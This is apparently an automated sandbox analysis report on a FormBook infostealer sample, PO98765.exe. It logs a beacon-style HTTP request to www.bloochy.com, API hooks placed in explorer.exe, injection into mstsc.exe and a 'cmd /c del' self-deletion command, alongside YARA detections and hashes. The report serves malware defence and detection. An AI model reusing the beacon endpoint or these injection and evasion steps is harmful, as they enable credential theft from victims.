                                              Nov 26, 2020 09:57:41.985487938 CET50OUTGET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1
                                              Host: www.bloochy.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 26, 2020 09:57:42.153270960 CET51INHTTP/1.1 403 Forbidden
                                              Date: Thu, 26 Nov 2020 08:57:42 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Sorting-Hat-PodId: 167
                                              X-Sorting-Hat-ShopId: 45989331112
                                              X-Dc: gcp-us-central1
                                              X-Request-ID: f0326ea8-ce8b-479d-8dcb-cb43ea808d5c
                                              X-Download-Options: noopen
                                              X-Permitted-Cross-Domain-Policies: none
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              CF-Cache-Status: DYNAMIC
                                              cf-request-id: 06a55edf67000032587c094000000001
                                              Server: cloudflare
                                              CF-RAY: 5f826745793b3258-FRA
                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: PO98765.exe PID: 484 Parent PID: 5836

                                              General

                                              Start time:09:56:19
                                              Start date:26/11/2020
                                              Path:C:\Users\user\Desktop\PO98765.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\PO98765.exe'
                                              Imagebase:0x350000
                                              File size:688128 bytes
                                              MD5 hash:137EC800F9C49390F2F225AB22774443
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Analysis Process: PO98765.exe PID: 2440 Parent PID: 484

                                              General

                                              Start time:09:56:28
                                              Start date:26/11/2020
                                              Path:C:\Users\user\Desktop\PO98765.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\PO98765.exe
                                              Imagebase:0xab0000
                                              File size:688128 bytes
                                              MD5 hash:137EC800F9C49390F2F225AB22774443
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 2440

                                              General

                                              Start time:09:56:30
                                              Start date:26/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: mstsc.exe PID: 6024 Parent PID: 3424

                                              General

                                              Start time:09:56:43
                                              Start date:26/11/2020
                                              Path:C:\Windows\SysWOW64\mstsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\mstsc.exe
                                              Imagebase:0x1070000
                                              File size:3444224 bytes
                                              MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 5068 Parent PID: 6024

                                              General

                                              Start time:09:56:47
                                              Start date:26/11/2020
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\PO98765.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 4484 Parent PID: 5068

                                              General

                                              Start time:09:56:47
                                              Start date:26/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >